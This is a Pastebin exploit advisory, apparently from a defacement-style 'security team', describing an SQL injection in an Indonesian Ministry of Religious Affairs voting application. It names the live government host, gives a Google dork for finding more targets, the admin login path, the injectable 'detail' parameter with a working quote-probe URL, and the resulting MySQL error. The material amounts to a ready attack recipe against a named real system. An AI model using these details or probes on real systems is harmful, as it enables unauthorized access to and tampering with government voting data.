Advertisement
KingSkrupellos

Kementerian Agama Indonesia Voting System SQL Injection

May 3rd, 2019
249
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.53 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Kementerian Agama Indonesia Voting System SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 04/05/2019
  7. # Vendor Homepage : polling-ap.kemenag.go.id
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : Aplikasi Pemilihan Agen Perubahan Kementerian Agama Online site:go.id
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  15. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  16. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  17.  
  18. ###################################################################
  19.  
  20. # Impact :
  21. ***********
  22. Kementerian Agama Indonesia Voting System is prone to an SQL-injection vulnerability because
  23. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  24. Exploiting this issue could allow an attacker to compromise the application, access or
  25. modify data, or exploit latent vulnerabilities in the underlying database.
  26. A remote attacker can send a specially crafted request to the vulnerable application and
  27. execute arbitrary SQL commands in application`s database. Further exploitation of this
  28. vulnerability may result in unauthorized data manipulation.
  29. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  30.  
  31. ###################################################################
  32.  
  33. # Admin Panel Login Path :
  34. ************************
  35. /?menu=login
  36.  
  37. # SQL Injection Exploit :
  38. **********************
  39. /formulir/frm_modal_table_detail.php?detail=[SQL Injection]
  40.  
  41. ###################################################################
  42.  
  43. # Example Vulnerable Sites :
  44. *************************
  45. Aplikasi Pemilihan Agen Perubahan Kementerian Agama Online
  46.  
  47. [+] polling-ap.kemenag.go.id/formulir/frm_modal_table_detail.php?detail=1%27
  48.  
  49. ###################################################################
  50.  
  51. # Example SQL Database Error :
  52. ****************************
  53. You have an error in your SQL syntax; check the manual that corresponds
  54. to your MySQL server version for the right syntax to use near 'ORDER BY id_data' at line 1
  55.  
  56. ###################################################################
  57.  
  58. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  59.  
  60. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement